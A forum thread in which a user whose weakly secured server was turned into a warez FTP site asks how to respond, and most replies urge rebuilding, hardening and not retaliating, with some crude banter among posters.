Announcement

Collapse
No announcement yet.

Best way to deal with someone breaking into my machine?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Best way to deal with someone breaking into my machine?

    Ok, here's the story.....

    The other day, I noticed that my internet connection was extremely slow. Further investigation revealed that my server machine outside my DMZ was the source of the slowdown. It turns out my server had been turned into a warez FTP site.

    Now I do admit that the machine was my "sacrificial lamb" - security was intentionally low, all the stuff of real importance is backed up on CD-Rom etc, so I could re-format the drive and not shed a tear about lost data. And, of course, the FTP site used a "universal login" I had set up for a project and forgotten about (username: user, password: user) - and again, the data that is of value is backed up already.

    What I want to know is, how should I deal with this transgression? I don't really want to make a big stink, I'm really not interested in prosecuting the persons who used my server. I just want to get the idea across that I don't really appreciate people using my server without my permission. I have log files of the IP addresses that connected to and used my server. While it was kinda my fault for leaving the user/user account, it still was annoying to deal with.

    I could, of coure, re-open the user/user account on my server, but corrupt the warez files on the system so people spend hours downloading garbage.... Or, I could program the system to drop the connection after 99% of the file has been downloaded, and not allow reconnect transfers.....

    Any thoughts? Oh, and yes, I have disabled the user/user login in my system!

    -Wembley

  • #2
    Originally posted by wembley
    [clip]
    What I want to know is, how should I deal with this transgression?
    [clip]
    Reformat, rebuild, reinstall, improve security, do not retaliate.

    Check your audit trails to make sure this was not used as a jump point for other machines.

    Retaliation will make you "look bad" and can lead to an arms race and escalation and the defender [may eventually] run the risk of DDoS when there are many attackers, or fairly skilled, but small numbers of attackers. Choosing to "fight back" by corrupting or trojaning software can also put you in jail (if in the U.S.) depending on what you do.

    The easiest path for you, and least work, with least risk for yourself seems to be to learn from the mistake and move on. The cost of retlaiation includes *not* learning something else or improving yourself over the same time.

    [Added content above in [ ] and below]

    From TAoW: (paraphrased) Do not start a battle if you cannot win. If you cannot win a battle, focus on defense or look to postpone engaging until you can win.
    Last edited by TheCotMan; June 14, 2004, 19:26. Reason: Added content

    Comment


    • #3
      I agree with thecotman. Personally, after I've imaged more machines I can count in one day, I get bored/tired/depressed, whatever, I still try and make sure that that machine can't be easily comprimised. I'm basically afraid a comprimised box could lead to a 'launch point' for that person to attack other boxes.

      I'd personally reimage the machine, and report the person to their ISP, most ISP's that I know of today have a very low tolerance for that kind of service abuse. Even if their ISP could care less, as least if you harden it, chances are they won't be back.

      After you reinstall the OS, harden it to the best of your ability, and then create an image of that clean install, so that if it happens again, you're just an image install away from a clean box. Review your logs, collect, regroup, and fix whatever allowed the comprimise.

      From my limited experience, unless you have somthing somone explicitly wants (besides just gaining control of the box) most people will bypass your box if they find out the basic, well-known exploits have been patched. I bet by keeping the software packages up to date and changing the default passwords it'll be alot longer before you get rooted again....unless you have a neighbor that likes to fuck with you.

      Comment


      • #4
        When you say "outside the DMZ" I take it you mean that it is on the Internet on the other side of your Firewall? That is the Wild West my friend. I don't expect a box to last a day out there.

        Comment


        • #5
          Not sure if it justified for this case, but I like to use the Baseball bat technique for spammer and spyware author... Just talking about it may do the job :D No need to actually do it...
          In case of hacking, what could be usefull is to make fake picture of script kiddie beaten up , so that once the said hacker break on your computer and find those, he might want to stay away of your computer :)
          /* NO COMMENT */

          Comment


          • #6
            you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.

            Comment


            • #7
              Originally posted by phobal
              you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.

              But Phobal, you're Bi... Doesn't that mean you enjoy getting your ass sodomized? If so, you can't really use it as an insult.

              Comment


              • #8
                to late you already made big stink, it was your fault, not kind of. you parked your car in watts and left the keys inside, what did you expect.
                so they turned you box in to a warez ftp, did you not notice your disk space being eaten up by the uploading of warez.
                calling the man, blah! just let it go and move on.
                "so many books, so little time"

                Comment


                • #9
                  By leaving your box basically open to attack you pretty much deserve whatever they hit you with. If you want security then you need to lock you stuff down and not *ever* do idiotic things like making the password the same as the username and picking a username as "user". Secure your stuff first, then think about retribution.
                  --- The fuck? Have you ever BEEN to Defcon?

                  Comment


                  • #10
                    Well, like I said, this box had nothing of value, just a few pictures, etc, and some WWW programs that I wanted access to from outside the firewall. While it was kinda my fault for leaving a username user with PW user, I was looking for creative ways to deal with the people who got in.

                    The theory is that if someone "haxx0red" my box outside the firewall, they wouldn't do anything to any of the stuff inside my firewall where the important stuff lives....

                    -Wembley

                    Comment


                    • #11
                      Originally posted by wembley
                      The theory is that if someone "haxx0red" my box outside the firewall, they wouldn't do anything to any of the stuff inside my firewall where the important stuff lives....
                      This is probably not a good idea to put into practice. If your external box gets "owned" then they will likley have a high-bandwidth jump point from which to launch other attacks [against your other machines.] Also, if this host is used by authorized users to gain access to hosts behind the firewall, then MiM or key-grabbing tools or other password retention programs can be used to leverage this exposed system access to include control of other machines behind your firewall.

                      [Edit: added content above- in [ ] which was omited in first round. ]
                      Last edited by TheCotMan; June 15, 2004, 19:19. Reason: added content

                      Comment


                      • #12
                        It's not what's *on* the box that's valuable, it's the box itself. Remember that *you* are liable for what goes on on machines that you own, and on the network connection that you pay for. Having a box rooted and turned into a warez server puts you at huge legal risk if, say, the RIAA comes knocking. Who knows, you could be one of their next 1000 lawsuits.
                        --- The fuck? Have you ever BEEN to Defcon?

                        Comment


                        • #13
                          Originally posted by wembley
                          While it was kinda my fault for leaving a username user with PW user
                          No, it was completely your fault that the user name and password were set to the same values [user].

                          Originally posted by wembley
                          I was looking for creative ways to deal with the people who got in.
                          As for dealing with people who broke into your system and then staged Warez and attacks off of your box, suck it up, start over and learn from the experience (and *ahem* make backups of the "evidence" in case any form of prosecution occurs ) .

                          Rebuild your box, place it in a dmz behind a firewall with appropriate security measures in place. If it's just website/ftp access you require, NAT/PAT those services through your firewall. Use SFTP and HTTPS. After the box is rebuilt, run tripwire and then re-run tripwire periodically to verify the box has been hacked. Your boxen have already been demonstrated vulnerable. The same people who hit the first time may very well come back looking for more. Don't give it to them.

                          While you're at it, if you are an enterprising individual, you could visit The Honeynet Project and create a REAL "sacrificial lamb" [as stated in your first post]. Watching what happens to your box configured as a honeypot could be a valuable learning experience.

                          hth
                          Last edited by spahkle; June 17, 2004, 01:58. Reason: kept switching tenses
                          “Bigamy is having one wife too many. Monogamy is the same.”

                          Comment


                          • #14
                            Originally posted by wembley
                            What I want to know is, how should I deal with this transgression? I don't really want to make a big stink, I'm really not interested in prosecuting the persons who used my server. I just want to get the idea across that I don't really appreciate people using my server without my permission. I have log files of the IP addresses that connected to and used my server.

                            I could, of coure, re-open the user/user account on my server, but corrupt the warez files on the system so people spend hours downloading garbage.... Or, I could program the system to drop the connection after 99% of the file has been downloaded, and not allow reconnect transfers.....
                            Originally posted by phobal
                            you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.
                            If you notice, Wembly at no point requested assistance in "retaliating" against the people who did this action. He asked for ideas in how to respond to a system intrusion. The majority of responses have been "rebuild/restore, learn, protect yourself better in the future."

                            Your response didn't make much sense to me. I have to ask, why wouldn't he ask his question (a valid question otherwise the admins would have moved it to /dev/null by now) in this forum? I realize we can't all be l33t like yourself with visions of self-grandeur looking down our nose at anybody who posts to the forum... but help us troglodytes out. Help us see the error of our ways for treating his request with the seriousness it merits.
                            “Bigamy is having one wife too many. Monogamy is the same.”

                            Comment

                            Working...
                            X